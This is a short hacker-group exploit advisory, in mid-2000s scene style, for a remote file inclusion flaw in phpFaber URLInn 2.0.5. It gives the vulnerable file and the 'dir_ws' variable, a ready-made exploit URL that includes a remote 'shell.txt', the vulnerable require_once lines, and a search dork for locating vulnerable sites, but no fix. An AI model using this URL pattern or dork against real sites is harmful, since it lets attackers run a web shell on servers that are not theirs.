/ \ _ ) (( )) ( (@) /|\ ))_(( /|\ |-| / | \ (/\|/\) / | \ (@) | |--------------------/--|-voV---\`|'/--Vov-|--\---------------------|-| |-| '^` (o o) '^` | | | | `\Y/' |-| |-| | | | | -=ShAd0w-CrEw=- |-| |-| | | | | |-| |_|___________________________________________________________________| | (@) l /\ / ( ( \ /\ l |-| l / V \ \ V \ l (@) l/ _) )_ \I `\ /' ` ---------------------------------------------- GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEeTs To ---------------------------------------------- A2J, iNs, The Pitbull, ICQBomber, str0ke ---------------------------------------------- BiG sHoUt OuT tO udplink.net ---------------------------------------------- Vulnerability Type: Remote File Inclusion Vulnerable file: /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php Exploit URL: http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt? Method: get Register_globals: On Vulnerable variable: dir_ws Line number: 78 Lines: ---------------------------------------------- require_once("$dir_ws/urlinn_includes/adodb/adodb.inc.php"); require_once("$dir_ws/urlinn_includes/smarty/Smarty.class.php"); require_once("$dir_ws/urlinn_includes/i_PageSelector.php"); ---------------------------------------------- ---------------------------------------------- FoUnD By BiNgZa AKA RaZor ---------------------------------------------- DoRk:Powered by phpFaber URLInn. Copyright © 2004-2006 phpFaber ---------------------------------------------- shadowcrew@hotmail.co.uk ---------------------------------------------- shadow.php0h.com ----------------------------------------------